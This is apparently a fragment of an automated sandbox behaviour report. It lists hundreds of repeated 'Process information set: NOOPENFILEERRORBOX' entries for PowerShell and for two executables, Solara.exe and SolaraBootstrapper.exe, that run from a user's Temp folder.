                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
